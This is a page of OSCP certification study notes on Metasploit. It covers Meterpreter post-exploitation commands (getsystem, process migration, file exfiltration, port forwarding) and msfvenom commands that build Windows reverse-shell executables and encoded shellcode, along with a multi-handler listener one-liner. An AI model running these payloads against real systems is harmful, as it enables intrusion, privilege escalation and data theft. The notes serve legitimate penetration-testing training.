🐲
OSCP Notes
  • 🐲OSCP Notes
  • 🐲OSCP Methodology
  • 💡Misc
    • Metasploit
    • Antivirus Evasion
    • Password attacks
    • Reverse Shells
    • Port Forwarding, Tunneling and Pivoting
      • Local Port Forwarding
      • Remote Port Forwarding
      • Dynamic Port Forwarding
      • Lingolo-ng
    • Information Gathering
      • Passive Reconnaissance
        • Whois
        • Google Dorks
        • NetCraft
        • Git Repository
      • Active Reconnaissance
        • DNS Enumeration
        • Host Discovery
        • Port scanning
        • SMTP - 25
        • SNMP
  • Linux
    • Local Enumeration
    • Local Privileges Escalation
      • Scheduled tasks
      • Password Authentication
      • Monitor Processes
      • SetUID Binaries and Capabilities
      • Sudoers
      • Kernel Exploits
  • Windows
    • 🧠Mindmap
    • 🥝Mimikatz Basics
    • Enumeration
      • External Enumeration
      • Local Enumeration
      • Active Directory
        • PowerView
    • NTLM Hashes
    • Local Privilege Escalation
      • Service Binary Hijacking
      • Service DLL Hijacking
      • Unquoted Service Paths
      • Scheduled Tasks
      • Token impersonation
      • Backup Operators Group
    • Lateral Movement
      • WMI and WinRM
      • PsExec
      • Pass The Hash
      • Overpass The Hash
      • Pass The Ticket
      • DCOM
    • Persistence
      • Golden Ticket
      • Shadow Copy
    • Authentication Attacks
      • AS-REP Roasting
      • Kerberoasting
      • Password Spray
      • Silver Ticket
      • DC Sync
    • Client Side
    • NTLM Authentication
    • Kerberos Authentication
    • Cached Credentials
  • Web attacks
    • WordPress
    • SQL Injection (SQLi)
    • Command Injection
    • Directory Traversal
    • Local File Inclusion (LFI)
    • File Upload
Powered by GitBook
On this page
  1. Misc

Metasploit

Database

Init Metaspolit database.

sudo msfdb init

Run postgresql service.

sudo systemctl enable postgresql

Workspaces

Change between workspaces for sperating the projects' databases.

workspace -a <workspace_name>

Nmap

db_nmap is a Nmap binary wrapper which saves results into Metasploit's database enables explore results later combined.

hosts - show found hosts and their operating system.

services - show found services and which host runs them.

Search Module

Metasploit module types:

  • Exploit Modules: Code to exploit vulnerabilities in systems.

  • Payload Modules: Code executed on the target post-exploitation.

  • Auxiliary Modules: Tools for scanning and information gathering.

  • Post Modules: Actions taken on a compromised system.

  • Encoder Modules: Obfuscate payloads to evade detection.

  • Nop Generator Modules: Create NOP sleds for buffer overflows.

  • Listener Modules: Set up a listener for incoming connections.

search type:<module_type> <module_name>
search <module_name>

Meterpeter

System information

Get system info

sysinfo

Get current user

getuid

Network

port fowarding

portfwd add -l <lport> -p <port> -r <rhost>

add route to the routing table

route add <subnet>/24 <session_id>

more useful commands

arp # Display the host ARP cache
getproxy # Display the current proxy configuration
ifconfig # Display interfaces ipconfig Display interfaces netstat Display the network connections 
resolve # Resolve a set of host names on the target

File System

commands with l prefix operate on the local system.

lcd <path>
lcat <file>

meterpeter allows extra file system commands like download or upload files from the local system to the target.

download <target_path> <local_path>
upload <local_path> <target_path>

Channels

channels -l # listing channels
channels -i <channel_id> # use other channel

Meterpeter Post Exploitation

How long the system is in idle which indicates if it's in use.

idletime

Elevate to system using Token impersonation methods automatically.

getsystem

migrating meterpeter process to other process.

migrate <dest_pid>

MSFVenom

Payloads

Search payloads for target platform

msfvenom -l payloads --platform windows --arch x64

Create executable payloads 

 # staged
msfvenom -p windows/x64/shell/reverse_tcp LHOST=<host> LPORT=<port> -f exe -o rev.exe
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=<host> LPORT=<port> -f exe -o rev.exe
 # not staged
msfvenom -p windows/x64/shell_reverse_tcp LHOST=<host> LPORT=<port> -f exe -o rev.exe

Generating shell code

msfvenom -p windows/shell_reverse_tcp LHOST=<LHOST> LPORT=<LPORT> -f powershell -v sc

Generating obfuscated shell code with bad words:

msfvenom -p windows/shell_reverse_tcp LHOST=<LHOST> LPORT=<LPORT> EXITFUNC=thread -f c –e x86/shikata_ga_nai -b "\x00\x0a\x0d\x25\x26\x2b\x3d"

Multi Handler

oneliner for multi handler

sudo msfconsole -x "use exploit/multi/handler;set payload windows/meterpreter/reverse_tcp;set LHOST <LHOST>;set LPORT <LPORT>;run;"

References

PreviousOSCP MethodologyNextAntivirus Evasion

Last updated 3 months ago

💡
  • Database
  • Workspaces
  • Nmap
  • Search Module
  • Meterpeter
  • System information
  • Network
  • File System
  • Channels
  • Meterpeter Post Exploitation
  • MSFVenom
  • Payloads
  • Multi Handler
  • References
LogoDeep Dive Into Stageless Meterpreter Payloads | Rapid7 BlogRapid7
LogoMetasploit Unleashed - Free Online Ethical Hacking CourseOffSec